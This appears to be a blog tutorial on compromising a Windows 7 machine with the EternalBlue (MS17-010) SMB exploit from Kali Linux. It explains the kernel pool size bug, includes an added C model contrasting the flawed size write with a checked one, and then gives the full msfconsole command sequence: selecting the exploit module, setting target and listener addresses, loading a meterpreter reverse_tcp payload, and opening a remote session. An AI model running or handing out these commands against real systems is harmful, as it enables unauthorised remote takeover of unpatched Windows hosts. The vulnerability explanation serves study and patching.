Exploit Windows PC using EternalBlue SMB Remote Windows Kernel Pool Corruption

This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow in a memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, which contains a mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that the overflow is well laid out to overwrite an SMBv1 buffer. This exploit, like the original, may not trigger 100% of the time, and should be run continuously until triggered.
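The size error described above, shown as a simplified model next to a corrected form. This is an added example, not code from the original post, from Metasploit or from the Windows driver; the struct, the function names and the sample values are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical header: a 32-bit (DWORD) byte count supplied by the sender. */
typedef struct { uint32_t cb_list; } list_hdr;

/* Flawed: the validated length is a 32-bit value, but it is stored through
 * a 16-bit (WORD) write, so the upper 16 bits keep the sender's value. */
static void shrink_flawed(list_hdr *h, uint32_t valid) {
    h->cb_list = (h->cb_list & 0xFFFF0000u) | (uint16_t)valid;
}

/* Corrected: refuse to grow the list, then store the full 32-bit value. */
static int shrink_checked(list_hdr *h, uint32_t valid) {
    if (valid > h->cb_list)
        return -1;
    h->cb_list = valid;
    return 0;
}

/* Bytes by which a copy sized from cb_list would run past the validated data. */
static uint32_t overhang(const list_hdr *h, uint32_t valid) {
    return h->cb_list > valid ? h->cb_list - valid : 0;
}

int main(void) {
    /* Constructed sample values: claimed size above 64 KiB, small valid part. */
    const uint32_t claimed = 0x00012000u, valid = 0x00000F00u;
    list_hdr a = { claimed }, b = { claimed };

    shrink_flawed(&a, valid);
    shrink_checked(&b, valid);

    printf("flawed : cb_list=0x%08x overhang=0x%x\n",
           (unsigned)a.cb_list, (unsigned)overhang(&a, valid));
    printf("checked: cb_list=0x%08x overhang=0x%x\n",
           (unsigned)b.cb_list, (unsigned)overhang(&b, valid));
    return 0;
}
```

Any later allocation or copy that trusts the stale size field works with a length larger than the data that was validated, which is the condition the MS17-010 update removes.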

Attacker: Kali Linux

Target: Windows 7

Open the terminal in Kali Linux and type msfconsole to load the Metasploit Framework.

msfconsole

use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.8

msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.21

msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) > exploit

From the screenshot you can see that we have a meterpreter session after the buffer overflow was exploited by overwriting the SMBv1 buffer.

meterpreter > sysinfo

About mahyar

OrcID: 0000-0001-8875-3362. PhD Candidate (National Academy of Sciences of Ukraine - Institute for Telecommunications and Global Information). MCP, MCSA, MCSE, MCTS, MCITP: Enterprise Administrator, CCNA, CCNP (R&S, Security), ISO/IEC 27001 Lead Auditor.
